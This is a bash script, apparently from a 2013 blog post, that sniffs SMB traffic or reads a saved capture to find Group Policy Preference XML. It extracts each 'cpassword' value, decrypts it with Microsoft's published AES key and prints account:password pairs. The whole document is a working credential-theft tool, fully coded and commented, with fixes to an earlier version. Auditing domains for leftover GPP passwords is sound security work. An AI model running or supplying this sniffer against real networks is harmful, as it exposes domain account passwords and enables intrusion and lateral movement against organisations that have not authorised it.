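#!/usr/bin/env bash
# Sniff Group Policy Preference (GPP) XML files as they are read over SMB,
# extract the "cpassword" attribute and decrypt it.
#
# cpassword is AES-256-CBC ciphertext with an all-zero IV under a fixed key
# that Microsoft published (MS-GPPREF 2.2.1.1.4); the plaintext is UTF-16LE.
# The base64 in the XML has its "=" padding stripped and must be re-padded
# before decoding.
#
# Usage: gpp-sniff.sh            # live capture on the default interface
#                                # (needs capture privileges)
#        gpp-sniff.sh file.pcap  # read a saved capture instead
# The functions can also be sourced and used on their own, e.g.
#   decrypt_cpassword 'j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw'
set -o pipefail

# Published GPP key (public knowledge, not a secret) and the zero IV.
# Passing "-iv ''" relied on openssl zero-padding a short hex string; spell it out.
readonly GPP_AES_KEY='4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'
readonly GPP_AES_IV='00000000000000000000000000000000'

#######################################
# Print the account name from one line of GPP XML.
# The attribute name differs per preference type (runAs in ScheduledTasks.xml,
# userName / accountName elsewhere); runAs is tried first, as before.
# Arguments: $1 - one line of XML
# Outputs:   the attribute value followed by a newline
# Returns:   1 and prints nothing when no such attribute is present
#######################################
parse_username() {
  local attr re
  for attr in runAs userName accountName; do
    re="${attr}=\"([^\"]*)\""
    if [[ $1 =~ $re ]]; then
      printf '%s\n' "${BASH_REMATCH[1]}"
      return 0
    fi
  done
  return 1
}

#######################################
# Print the cpassword attribute value from one line of GPP XML.
# Arguments: $1 - one line of XML
# Outputs:   the (unpadded) base64 value followed by a newline
# Returns:   1 and prints nothing when the attribute is absent
#######################################
parse_cpassword() {
  local re='cpassword="([^"]*)"'
  [[ $1 =~ $re ]] || return 1
  printf '%s\n' "${BASH_REMATCH[1]}"
}

#######################################
# Restore the "=" padding that GPP strips from the base64 value.
# The original computed 4 - len % 4 with expr and then looped over
# {1..$n}, which bash never expands (brace expansion runs before parameter
# expansion), so exactly one "=" was always appended, and a length that is
# already a multiple of 4 would have received four.
# Arguments: $1 - base64 string without padding
# Outputs:   the string padded to a multiple of 4 characters
#######################################
pad_base64() {
  local s="$1"
  while (( ${#s} % 4 )); do
    s+='='
  done
  printf '%s\n' "$s"
}

#######################################
# Decrypt one cpassword value.
# Arguments: $1 - the cpassword attribute value (unpadded base64)
# Outputs:   the plaintext password, converted from UTF-16LE to UTF-8,
#            followed by a newline
# Returns:   1 and prints nothing on empty input or if any stage fails
#            (pipefail makes a bad decrypt fail the command substitution)
#######################################
decrypt_cpassword() {
  local b64 plain
  [[ -n "$1" ]] || return 1
  b64=$(pad_base64 "$1") || return 1
  plain=$(printf '%s' "$b64" \
    | base64 -d \
    | openssl aes-256-cbc -d -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
    | iconv -f UTF-16LE -t UTF-8) || return 1
  printf '%s\n' "$plain"
}

#######################################
# Capture (or read) SMB traffic and print "account:password" per cpassword seen.
# Arguments: $1 - optional pcap file; without it tshark captures live
# Outputs:   one "account:password" line per XML line carrying a cpassword
#######################################
main() {
  local -a capture_args=()
  local line user cpw
  if (( $# > 0 )); then
    capture_args=(-r "$1")
  fi
  # smb.cmd 0x2e is SMB1 SMB_COM_READ_ANDX; the file bytes are in smb.file_data.
  # SMB2/3 reads are not matched by this filter. The original nested single
  # quotes around cpassword did not nest, so the string literal was unquoted.
  # -Y is the display filter (older tshark: -2 -R). tr strips the ":" some
  # tshark versions put between hex bytes; grep -a keeps it from treating the
  # reassembled file as binary.
  tshark "${capture_args[@]}" -Y 'smb.cmd == 0x2e and tcp contains "cpassword"' \
      -T fields -e smb.file_data \
    | tr -d ':' \
    | xxd -r -p \
    | grep -a cpassword \
    | while IFS= read -r line; do
        cpw=$(parse_cpassword "$line") || continue
        user=$(parse_username "$line")
        printf '%s:%s\n' "$user" "$(decrypt_cpassword "$cpw")"
      done
}

if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
  main "$@"
fi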
Sunday, March 3, 2013
Bash script to sniff, parse, and decrypt GPP cpassword values from GPO files read over SMB